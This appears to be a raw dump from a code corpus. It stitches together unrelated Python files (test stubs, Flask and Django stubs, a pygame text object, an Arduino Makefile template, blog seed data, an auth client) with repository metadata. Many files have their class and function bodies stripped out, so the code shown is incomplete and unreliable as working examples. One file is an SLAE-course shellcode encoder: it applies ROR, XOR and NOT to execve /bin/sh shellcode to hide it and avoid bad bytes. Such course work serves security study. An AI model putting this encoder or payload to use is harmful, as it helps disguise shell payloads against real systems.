] | 28 | 2018-02-14T23:14:59.000Z | 2021-07-08T07:24:54.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
] | 1 | 2019-01-21T15:25:49.000Z | 2019-01-23T19:03:06.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
] | 2 | 2018-09-27T05:46:46.000Z | 2020-07-16T05:19:02.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
# TODO: Should we ensure that the metadata is up to date?
if __name__ == '__main__':
nose.main()
| 40.852941 | 83 | 0.636069 |
c7a1b4eccd5313fe3d7a77b6d5633a8332809125 | 2,012 | py | Python | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
] | null | null | null | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
] | 1 | 2021-06-02T00:35:43.000Z | 2021-06-02T00:35:43.000Z | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
] | null | null | null | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
| 24.240964 | 97 | 0.548708 |
c7a2778b2130c187c84f5bc78fd439f687e7ad10 | 450 | py | Python | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | 19 | 2017-02-18T17:53:56.000Z | 2017-03-11T22:09:06.000Z | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | from django.forms import forms
| 23.684211 | 86 | 0.622222 |
c7a2d818488a83ba3e02cfaea886aa5551f314ae | 1,172 | py | Python | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 15 | 2015-08-11T09:50:00.000Z | 2021-10-02T19:30:53.000Z | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | null | null | null | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 9 | 2015-08-11T09:51:55.000Z | 2021-10-18T18:04:11.000Z | #!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: Guillaume Kaddouch
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| 23.44 | 102 | 0.562287 |
c7a32b4c1d013fec417f68425b02fe13d88c171e | 9,292 | py | Python | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
] | null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
] | null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
] | 1 | 2021-01-31T13:08:48.000Z | 2021-01-31T13:08:48.000Z | import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
included in the reponse to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
provided entity. If none of the provided types match of if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
return _entity_converter
| 35.19697 | 88 | 0.660461 |
c7a3e79d5fcb0530f653c35813c95268647570c7 | 9,739 | py | Python | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
] | 24 | 2019-01-25T20:40:07.000Z | 2020-11-20T08:12:14.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
] | 3 | 2018-11-28T14:04:57.000Z | 2020-09-14T08:35:09.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
] | 6 | 2019-08-23T05:30:26.000Z | 2020-11-20T08:12:03.000Z | from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
# noinspection PyPep8Naming
# noinspection PyPep8Naming
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive()
| 36.339552 | 118 | 0.618133 |
c7a3f3c709f3111aed4b0e26101a434835f55c66 | 3,959 | py | Python | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
] | 1 | 2022-01-09T13:59:34.000Z | 2022-01-09T13:59:34.000Z | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
] | null | null | null | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
] | null | null | null | DEPTH = 3
# Action
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | 32.186992 | 99 | 0.51023 |
c7a4ae3d4e412782ea4851134b89f174c5ee6fd3 | 224 | py | Python | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
] | null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
] | null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/pyton
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF
| 12.444444 | 24 | 0.71875 |
c7a95d54d497e531abccb6e65c1f8ff7b1fbb2e5 | 7,202 | py | Python | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
] | null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
] | null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
] | 1 | 2020-11-01T23:54:52.000Z | 2020-11-01T23:54:52.000Z | # coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
| 43.648485 | 120 | 0.509303 |
c7a995a9727073409d096c9586ccf8c67b8e8dc3 | 7,320 | py | Python | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
] | null | null | null | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
] | 3 | 2015-01-09T20:31:22.000Z | 2015-01-09T20:31:22.000Z | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Copyright 2012 Rodrigo Pinheiro Matias <rodrigopmatias@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| 27.518797 | 138 | 0.630464 |
c7a9d270039cb319b1e7bd45460f8d2badbcbfe0 | 1,562 | py | Python | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
] | 2 | 2016-04-13T02:52:46.000Z | 2017-11-20T22:41:36.000Z | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
] | null | null | null | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
] | 3 | 2016-04-14T02:29:32.000Z | 2020-04-27T06:08:07.000Z | import pygame
from pygame.locals import *
import resourceManager
| 31.24 | 68 | 0.596031 |
c7aa2635f7e1d5416d843dacc6078257816ee795 | 2,268 | py | Python | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
] | 4 | 2018-01-04T22:31:08.000Z | 2021-07-15T17:39:16.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
] | 7 | 2017-10-31T23:47:47.000Z | 2022-01-10T00:12:42.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
] | 10 | 2017-09-14T00:57:07.000Z | 2021-07-27T23:41:14.000Z | from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| 28 | 98 | 0.740741 |
c7aa99e86ce9b9941bb3c2dee52be602130563cd | 200 | py | Python | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
] | 1 | 2021-10-11T20:20:50.000Z | 2021-10-11T20:20:50.000Z | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
] | null | null | null | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
] | 2 | 2021-01-22T10:52:04.000Z | 2021-10-06T10:28:07.000Z | from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | 20 | 31 | 0.81 |
c7ae90de0db880bd9c87e6ef499b2ab425e89a1b | 19 | py | Python | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
] | null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
] | null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
] | null | null | null | """Todo module."""
| 9.5 | 18 | 0.526316 |
c7aedff29cfbc578d32b6b83c7dce7618a9b1e46 | 680 | py | Python | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
] | 1 | 2021-05-11T14:15:11.000Z | 2021-05-11T14:15:11.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
] | 14 | 2021-02-23T11:53:08.000Z | 2021-11-16T10:45:31.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
] | null | null | null | #!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: Ben Winchester
# Copyright: Ben Winchester, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
| 21.25 | 88 | 0.507353 |
c7b0b81ceafaed0e74acb2a5f98af6b65a8f276d | 1,850 | py | Python | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
] | null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
] | null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
] | 1 | 2020-05-03T04:34:32.000Z | 2020-05-03T04:34:32.000Z | import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
| 31.355932 | 85 | 0.656216 |
c7b0f4e12943a98dbd413a45f48a80cdcaf7bcf6 | 6,517 | py | Python | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
] | null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
] | null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
] | null | null | null | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
] | 29.224215 | 77 | 0.399724 |
c7b11734daef5c05aa9cf025632e59324996f20e | 2,954 | py | Python | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | 1 | 2017-05-06T04:49:45.000Z | 2017-05-06T04:49:45.000Z | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
